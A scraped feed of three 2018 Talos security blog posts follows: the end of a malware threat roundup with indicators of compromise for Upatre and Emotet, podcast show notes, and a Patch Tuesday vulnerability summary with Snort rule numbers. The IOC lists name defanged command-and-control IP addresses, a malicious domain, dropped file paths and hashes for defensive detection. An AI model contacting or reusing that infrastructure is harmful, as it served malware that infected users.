src="https://4.bp.blogspot.com/-7J0i2oHHKro/W-8MeYQ1zEI/AAAAAAAABLI/lSlJjDmyM6ULuM9WU8PMfeOsx_CKTUfPwCLcBGAs/s640/010054eb95e98fdfea1f1164b12a5dcf475f0ffcc16dc18c276553d4bce3e39c_umbrella.png" width="640" /></a></div><br /><br /><h3>Win.Downloader.Upatre-6746951-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>195[.]38[.]137[.]100</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>drippingstrawberry[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ffengh.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hfsrfgs.exe</li><li>%LocalAppData%\Temp\ffengh.exe</li><li>hfsrfgs.exe</li></ul><b>File Hashes</b><br /><ul><li>1b806d44ead6688b22e623a1d50ad910af73b6ebe274901cccff8aabd526e3dd</li><li>1df5a1477102ad9d32a976eea0af04b7c63a660fefc39a8c2c524e8cfa9634e3</li><li>2e09c458bc34495f4390b2783d17369a2f809860eb95b95ff914c6610fd42ab0</li><li>56db7b1dd0bcbeca631eee556146fb599fc363466f51ec01eae28ecd4289e838</li><li>61e96310f388db546db48b6b8d81958264647add9f7cc880067cd6f875b5b4f9</li><li>64c1bb68e91d30812c0ea2690a4bb15d2788b43ec6c54aa9672de758ee7e5042</li><li>71dfc74d26d696f74b65c03c93a9118b9c62e5adfb6c93a5e15d00dcb50d585f</li><li>7a305e442718a07f2ddcc7ae9a8983c49be3247c123b06dabcf7d48d3a4bdcde</li><li>7da8dd2d31ad4ed61c87b5f44e1d70bcb938d9c5ff9abbc94c8e76cf0b10f379</li><li>87071c84cff348e086cb28fcfeec54daf58d728c5fb3aaa26ff4aca42fab4b4f</li><li>99230cc2ba171d71a9c5bade432d53bbf1ea78be629f62b90bb73fd71a26e8a4</li><li>af44d4fff8ce394f9ecb9b3f9d95b8fb440a7b8f1892574f41355072ec2f0999</li><li>bcdfdc97d2a6f3769902d3bf55b180b4dd9efc74af345cf23a795dbdc9456b51</li><li>c224d27d7adf2fece2e92d4ed2f62e244e8e5bcaa98c89ade06d40b0112e6bd1</li><li>d7afe736ed75987b854236b451a4cb6f0642b4e9cc92f3a9a96e2b8535070d05</li><li>d9d107fed85d142d6a5cb4d40a48b3ddf5c61f97bc502a297f816ac902fa13a6</li><li>e4eddc3910aca83db9bef4bc4f11006c0ae09a1552a6266adac79dc922ffe90a</li><li>e6c03bfb271c97063320d079b7ed156b8eae18c75ccf5c25d5ae5cc01df62139</li><li>f41388706c803a31645f416804995ad881d8ee0e0de0f0c355fb87fc415de211</li><li>fb75875cdf989e58a80330aa43543b9ab3765fde077174729e2011555cd295d9</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-rum40lUb_bE/W-8MrA6QurI/AAAAAAAABLU/_ajK9YebfCA-4fYxLBS8fhf26iCCKhB9QCLcBGAs/s1600/1df5a1477102ad9d32a976eea0af04b7c63a660fefc39a8c2c524e8cfa9634e3_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-rum40lUb_bE/W-8MrA6QurI/AAAAAAAABLU/_ajK9YebfCA-4fYxLBS8fhf26iCCKhB9QCLcBGAs/s400/1df5a1477102ad9d32a976eea0af04b7c63a660fefc39a8c2c524e8cfa9634e3_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-BgkN6BBGgeQ/W-8Mwx4PQxI/AAAAAAAABLc/h5nOSApYDUM1zpFlZXIp-VcZXJlKcj3ZwCLcBGAs/s1600/56db7b1dd0bcbeca631eee556146fb599fc363466f51ec01eae28ecd4289e838_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="505" data-original-width="962" height="334" src="https://2.bp.blogspot.com/-BgkN6BBGgeQ/W-8Mwx4PQxI/AAAAAAAABLc/h5nOSApYDUM1zpFlZXIp-VcZXJlKcj3ZwCLcBGAs/s640/56db7b1dd0bcbeca631eee556146fb599fc363466f51ec01eae28ecd4289e838_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-dyim72ozFvM/W-8M2KAn2yI/AAAAAAAABLg/MaLujEwbPOw9m_D8-GdV_aQ2I2e11hpZgCLcBGAs/s1600/af44d4fff8ce394f9ecb9b3f9d95b8fb440a7b8f1892574f41355072ec2f0999_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-dyim72ozFvM/W-8M2KAn2yI/AAAAAAAABLg/MaLujEwbPOw9m_D8-GdV_aQ2I2e11hpZgCLcBGAs/s640/af44d4fff8ce394f9ecb9b3f9d95b8fb440a7b8f1892574f41355072ec2f0999_umbrella.png" width="640" /></a></div><br /><br /><h3>Win.Malware.Emotet-6745295-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\GENRALNLA <ul><li>Value Name: ObjectName</li></ul></li></ul><b>Mutexes</b><br /><ul><li>Global\I98B68E3C</li><li>Global\M98B68E3C</li><li>PEM19C</li><li>PEM52C</li><li>PEM748</li><li>PEM43C</li><li>PEM20C</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>187[.]162[.]64[.]157</li><li>98[.]144[.]2[.]113</li><li>200[.]71[.]62[.]76</li><li>82[.]211[.]30[.]202</li><li>165[.]255[.]91[.]69</li><li>154[.]0[.]171[.]246</li><li>110[.]142[.]247[.]110</li><li>119[.]59[.]124[.]163</li><li>108[.]51[.]20[.]17</li><li>197[.]249[.]165[.]27</li><li>96[.]242[.]234[.]105</li><li>217[.]91[.]43[.]150</li><li>66[.]220[.]110[.]56</li><li>72[.]67[.]198[.]45</li><li>183[.]88[.]1[.]238</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>N/A</li></ul><b>File Hashes</b><br /><ul><li>0edecb893280c8258b5ee20f17afdbdcd09efdec198ba3f0b9dae3bb3a74c497</li><li>11fb93e3b137ff6978fd79fdd634f44f257ee28f9bc5c2965108cb5c49a0d949</li><li>313f19bdb8c46b96ac18bca55f53f5c0eb03d2fcececaab47b9339d8f014f7c7</li><li>40651a1759d2ae614541d3f6e8bb6298ab72a242673c44e541dc28e30ca8929f</li><li>5df55f78a21cd8457c9432afc8da45c182fad6107e3b6e4f5cf86272b68012b1</li><li>70921b45506097595f7d11123c1b5c92aa032332c8a503058b27f32ec85d8df2</li><li>73689ce1d669a63bdc781fab63f052fdc22021f7d08d37ed7573d2da7230568e</li><li>83b316b9a9f76efcab1e741c8eeb7a0c7a50072c3fde5acd49cb0d28afbe7a23</li><li>9edeb5b8ba0b6fd036650f80edf1cdd3c35974fcb8ef5a272b658d3ec1a38035</li><li>b53fb3cf4ed1d4e62dd0cc9d8e1d482dc1a55dedc3804a097f1b213080bb64c5</li><li>dab7877de92a3793873fec30c4b2e4a758bd5c3c6a67c8da20bfce7c255031be</li><li>ea8479d471d38105312f8264f2d93c7dd317d1bfda94f345f74313efffe8fb54</li><li>eba4704ea3e2a37a2bef98101758cbd2264bf6dcfe36eb930fe36fa32d75838a</li><li>f2a2d0eda6e21c4273d07aafe190918d96c21db335de4c4872e1eca136920c6b</li><li>fba4b9baf4b72790f1ff9ad58160efd7bd4a1927191668da75468255083e48b9</li><li>fc5935b12a8d07abcafc613a04d3c6773e088f31b88f78acc7f8ee2d2fc2d529</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-sxZXgnKirDo/W-8NDT9QSGI/AAAAAAAABLo/EFx2nDiHAx4wejDJYBQZ2wyhfVnVKOYbgCLcBGAs/s1600/40651a1759d2ae614541d3f6e8bb6298ab72a242673c44e541dc28e30ca8929f_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-sxZXgnKirDo/W-8NDT9QSGI/AAAAAAAABLo/EFx2nDiHAx4wejDJYBQZ2wyhfVnVKOYbgCLcBGAs/s400/40651a1759d2ae614541d3f6e8bb6298ab72a242673c44e541dc28e30ca8929f_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-4ROwjwTV-vk/W-8NKVxZpnI/AAAAAAAABLs/FkvXxcHHpC0vTDj1PKMi9ue4KNNaQhkNgCLcBGAs/s1600/fba4b9baf4b72790f1ff9ad58160efd7bd4a1927191668da75468255083e48b9_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="633" data-original-width="962" height="420" src="https://1.bp.blogspot.com/-4ROwjwTV-vk/W-8NKVxZpnI/AAAAAAAABLs/FkvXxcHHpC0vTDj1PKMi9ue4KNNaQhkNgCLcBGAs/s640/fba4b9baf4b72790f1ff9ad58160efd7bd4a1927191668da75468255083e48b9_tg.png" width="640" /></a></div><b><br /></b><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><br /></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/heeAUQuVzwQ" height="1" width="1" alt=""/>2018-12-13T14:21:28.953-05:000https://blog.talosintelligence.com/2018/11/threat-roundup-1109-1116.htmlBeers with Talos Ep. #41: Sex, money and malwarehttp://feedproxy.google.com/~r/feedburner/Talos/~3/MQNAq8HRxgE/beers-with-talos-ep-41-sextortion-money.htmlbeers with talosmobilepodcastvulnerability analysisnoreply@blogger.com (Mitch Neff)Wed, 14 Nov 2018 08:38:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-7874716333295536854<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAIU/lz_fWXn3B7YnoXCcqaHFQpgkXSaMpvi3QCPcBGAYYCw/s1600/facebook_timeline_podcast.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="630" data-original-width="1200" height="336" src="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAIU/lz_fWXn3B7YnoXCcqaHFQpgkXSaMpvi3QCPcBGAYYCw/s640/facebook_timeline_podcast.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-syTSjAlQ2EU/Wnn7oGQRmrI/AAAAAAAAAMg/vMFSk35zsngnKM3izSOla6RSmylI07__QCLcBGAs/s1600/BWT_EP22_MattBubble.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br class="Apple-interchange-newline" /></a></div>Beers with Talos (BWT) Podcast Ep. #41 is now available. Download this episode and subscribe to Beers with Talos:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://4.bp.blogspot.com/-WLkU01IRCLw/WaWCg3YHpRI/AAAAAAAAAJA/nQ2rFarDFeAUBY4ncARRUVaNkMpBKC0KgCLcBGAs/s1600/itunes_button.png" /></a><a href="https://play.google.com/music/listen?u=0#/ps/Ikcmodkhrjtblk5yks47s5uqbca" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://2.bp.blogspot.com/-E-RSSZ9jbUY/WaWCkLGZnZI/AAAAAAAAAJE/Ciiz-Si4oA0cgR9tMGSGbT9336qrYuDeACLcBGAs/s1600/google_play_button.png" /></a><a href="https://www.stitcher.com/podcast/talos/beers-with-talos" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://1.bp.blogspot.com/-HIihRfTvh8I/WedjsKBFNhI/AAAAAAAAAKk/TCPBZoIkYdcW8QJujRtxxwjr70x4drh_wCEwYBhgL/s1600/stitcher_button.png" /></a></div><br />If iTunes and Google Play aren't your thing, click&nbsp;<a href="http://www.talosintelligence.com/podcast">here</a>.<br /><h3></h3><h3>Ep. #41 show notes:&nbsp;</h3>Recorded Nov. 9, 2018 — We tried to make this episode last week, but thanks to some technical difficulties, we ended up calling that one a practice run. Here is take two, focused on recent sextortion scams and the pending machine learning apocalypse. We also review why vulnerability discovery and red teams are the most import line items in your security budget by looking a recent story where a breach cost dozens of lives.<br /><h3><a name='more'></a>The timeline:</h3><div><div><h4>The topics</h4>00:38 — Roundtable: We are now trivia-worthy<br />12:25 — Persian Stalker and on down the mobile rabbit hole<br />22:45 — The anatomy of sextortion scams<br />31:32 — Machine learning and the malware wars<br />45:20 — Vulnerability discovery: Why our 200-vuln milestone is both important and amazing<br />52:32 —Save the red team, CIA covert comms cover blown<br />1:02:49 — Closing thoughts and parting shots<br /><h4>The links</h4><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></div><ul><li><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://twitter.com/sectalks_twb/status/1060511824246845440" target="_blank">BWT as a Trivia question</a></span></li><li><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blog.talosintelligence.com/2018/11/persian-stalker.html" target="_blank">Persian Stalker blog post</a></span></li><li><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blog.talosintelligence.com/2018/10/anatomy-of-sextortion-scam.html" target="_blank">Anatomy of a Sextortion Scam</a></span></li><li><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://govmatters.tv/cyber-vulnerabilities-in-supply-chain-management/" target="_blank">Government Matters interview</a></span></li><li><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://foreignpolicy.com/2018/08/15/botched-cia-communications-system-helped-blow-cover-chinese-agents-intelligence/" target="_blank">CIA comms system blown open</a></span></li></ul></div><div>==========<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br />Featuring:&nbsp;<a href="https://twitter.com/security_craig">Craig Williams</a>&nbsp;(@Security_Craig),&nbsp;<a href="https://twitter.com/JoelEsler">Joel Esler</a>&nbsp;(@JoelEsler),&nbsp;<a href="https://twitter.com/kpyke">Matt Olney</a>&nbsp;(@kpyke) and&nbsp;<a href="https://twitter.com/EnglishLFC">Nigel Houghton</a>&nbsp;(@EnglishLFC).<br />Hosted by&nbsp;<a href="https://twitter.com/MitchNeff">Mitch Neff</a>&nbsp;(@MitchNeff).<br />Find all episodes&nbsp;<a href="http://cs.co/talospodcast">here</a>.<br /><br /><a href="http://cs.co/talositunes">Subscribe via iTunes</a>&nbsp;(and leave a review!)<br /><br />Check out the&nbsp;<a href="http://cs.co/talosresearch">Talos Threat Research Blog</a><br /><br />Subscribe to the&nbsp;<a href="http://cs.co/talosupdate">Threat Source newsletter</a><br /><br />Follow&nbsp;<a href="http://cs.co/talostwitter">Talos on Twitter</a><br /><br />Give us your feedback and suggestions for topics:<br /><a href="mailto:beerswithtalos@cisco.com">beerswithtalos@cisco.com</a></div></div></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/MQNAq8HRxgE" height="1" width="1" alt=""/>2018-11-14T12:12:51.446-05:000https://blog.talosintelligence.com/2018/11/beers-with-talos-ep-41-sextortion-money.htmlMicrosoft Patch Tuesday — November 2018: Vulnerability disclosures and Snort coveragehttp://feedproxy.google.com/~r/feedburner/Talos/~3/Jiyuq1xupwg/microsoft-patch-tuesday-october-2018_13.htmlMicrosoftMicrosoft Patch TuesdaySnortSnort Rulesvulnerabilitiesnoreply@blogger.com (Jonathan Munshaw)Tue, 13 Nov 2018 10:53:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-7263444914334351903<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-o-bMM_JQczQ/XBKvF5mhu2I/AAAAAAAAABI/njSHtUvhcq89lJC3EiBDgRE4afjI2nJTACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://2.bp.blogspot.com/-o-bMM_JQczQ/XBKvF5mhu2I/AAAAAAAAABI/njSHtUvhcq89lJC3EiBDgRE4afjI2nJTACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg" /></a></div><br />Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 53 vulnerabilities, 11 of which are rated "critical," 40 that are rated "important” and one “moderate” and “low” vulnerability, each.<br /><br />The advisories cover bugs in the Chakra scripting engine, Microsoft Outlook and DirectX.<br /><br />This update also includes three advisories. One covers vulnerabilities in Adobe Flash Player, and another covers important bugs in the Microsoft Surface tablet. Additionally, there is guidance for how users should configure BitLocker in order to properly enforce software encryption.<br /><br />For more on our coverage for these vulnerabilities, check out the SNORTⓇ blog post <a href="https://blog.snort.org/2018/11/snort-rule-update-for-nov-13-microsoft.html">here</a>.<br /><a name='more'></a><br /><h2 style="text-align: left;">Critical vulnerabilities</h2>Microsoft disclosed 11 critical vulnerabilities this month, which we will highlight below. There is also a critical advisory covering Adobe Flash Player.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8541">CVE-2018-8541</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8542">CVE-2018-8542</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8543">CVE-2018-8543</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8551">CVE-2018-8551</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8555">CVE-2018-8555</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8556">CVE-2018-8556</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8557">CVE-2018-8557</a> and <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8588">CVE-2018-8588</a> are all memory corruption vulnerabilities in the Chakra scripting engine. They all lie in the way that the scripting engine handles objects in memory in the Microsoft Edge internet browser. These vulnerabilities could corrupt memory in a way that an attacker could execute code in the context of the current user. An attacker needs to convince a user to open a specially crafted, malicious website on Microsoft Edge in order to exploit these bugs.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8476">CVE-2018-8476</a> is a remote code execution vulnerability in the Windows Deployment Services TFTP server. The bug lies in the way the TFTP server handles objects in memory. An attacker could exploit this vulnerability by supplying the user with a specially crafted request.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8553">CVE-2018-8553</a> is a remote code execution vulnerability in Microsoft Graphics Components that lies in the way Graphics Components handles objects in memory. An attacker can exploit this vulnerability by providing the user with a specially crafted file.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8544">CVE-2018-8544</a> is a remote code execution vulnerability that exists in the way that the VBScript engine handles objects in memory. An attacker needs to trick a user into visiting a specially crafted website on Internet Explorer in order to exploit this vulnerability. Alternatively, the attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts Internet Explorer’s rendering engine.<br /><br />ADV180025 addresses several vulnerabilities in Adobe Flash Player, which are outlined by Adobe in a separate release. Microsoft recommends updating to the latest version of Flash Player, as well as disabling Flash on its web browsers.<br /><br /><h2 style="text-align: left;">Important vulnerabilities</h2>There are also 40 important vulnerabilities in this release. We would like to specifically highlight seven of them.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8256">CVE-2018-8256</a> is a remote code execution vulnerability in PowerShell when it improperly handles specially crafted files. An attacker could execute malicious code on a vulnerable system. This update fixes the vulnerability by ensuring that PowerShell properly handles files.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8574">CVE-2018-8574</a> and <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8577">CVE-2018-8577</a> are remote code execution vulnerabilities in Microsoft Excel that occurs when the software fails to properly handle objects in memory. An attacker could exploit this bug by tricking the user into opening a specially crafted Excel file, either as an email attachment or another method.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8582">CVE-2018-8582</a> is a remote code execution vulnerability in Microsoft Outlook when the software fails to properly parse specially modified rule export files. Users who have their settings configured to allow fewer user rights are less impacted by this vulnerability than those who operate with administrative user rights. Workstations and terminal servers that use Microsoft Outlook are also at risk. An attacker needs to convince a user to open a specially crafted rule export file in an email in order to trigger this bug.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8450">CVE-2018-8450</a> is a remote code execution vulnerability that exists when Windows Search handles objects in memory. An attacker could trigger this vulnerability by sending a specially crafted function to the Windows Search service, or via an SMB connection.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8550">CVE-2018-8550</a> is an elevation of privilege in Windows COM Aggregate Marshaler. An attacker who successfully exploits the vulnerability could run arbitrary code with elevated privileges. The vulnerability does not directly allow the user to execute arbitrary code, but it could be used in conjunction with other bugs to execute code with elevated privileges.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8570">CVE-2018-8570</a> is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. An attacker could exploit this bug by hosting a malicious website on Internet Explorer and then convincing the user to visit the link.<br /><br />The other important vulnerabilities are:<br /><ul style="text-align: left;"><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8408">CVE-2018-8408</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8415">CVE-2018-8415</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8417">CVE-2018-8417</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8471">CVE-2018-8471</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8485">CVE-2018-8485</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8522">CVE-2018-8522</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8524">CVE-2018-8524</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8539">CVE-2018-8539</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8545">CVE-2018-8545</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8547">CVE-2018-8547</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8549">CVE-2018-8549</a></li><li><a href="https://www.blogger.com/"><span id="goog_826666680"></span>CVE-2018-8552<span id="goog_826666681"></span></a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8554">CVE-2018-8554</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8558">CVE-2018-8558</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8561">CVE-2018-8561</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8562">CVE-2018-8562</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8563">CVE-2018-8563</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8564">CVE-2018-8564</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8565">CVE-2018-8565</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8566">CVE-2018-8566</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8567">CVE-2018-8567</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8568">CVE-2018-8568</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8572">CVE-2018-8572</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8573">CVE-2018-8573</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8575">CVE-2018-8575</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8576">CVE-2018-8576</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8578">CVE-2018-8578</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8579">CVE-2018-8579</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581">CVE-2018-8581</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8584">CVE-2018-8584</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8589">CVE-2018-8589</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8592">CVE-2018-8592</a>&nbsp;</li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8407">CVE-2018-8407</a></li></ul><h2 style="text-align: left;">Moderate vulnerabilities</h2>The one moderate vulnerability is <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8546">CVE-2018-8546</a>, a denial-of-service vulnerability in the Skype video messaging service.<br /><br /><h2 style="text-align: left;">Low vulnerability</h2>There is also one low-rated vulnerability, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8416">CVE-2018-8416</a>, which is a tampering vulnerability in the .NET Core.<br /><a href="http://2.bp.blogspot.com/-Z50YbM6x1UQ/W-sgysmyNtI/AAAAAAAAEms/Hosgxldu4Z07rJvRjEHjJNXF6aCQgnYAACK4BGAYYCw/s1600/patch_availability_available.jpg" imageanchor="1"><img border="0" height="128" src="https://2.bp.blogspot.com/-Z50YbM6x1UQ/W-sgysmyNtI/AAAAAAAAEms/Hosgxldu4Z07rJvRjEHjJNXF6aCQgnYAACK4BGAYYCw/s640/patch_availability_available.jpg" width="640" /></a><br /><h2 style="text-align: left;">Coverage</h2>In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.<br /><br /><br />Snort rules: <a href="https://snort.org/advisories/talos-rules-2018-11-13">32637, 45142, 45143, 48399 - 48404, 48374 - 48388, 48393 - 48395, 48360 - 48373, 48408 - 48410</a></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/Jiyuq1xupwg" height="1" width="1" 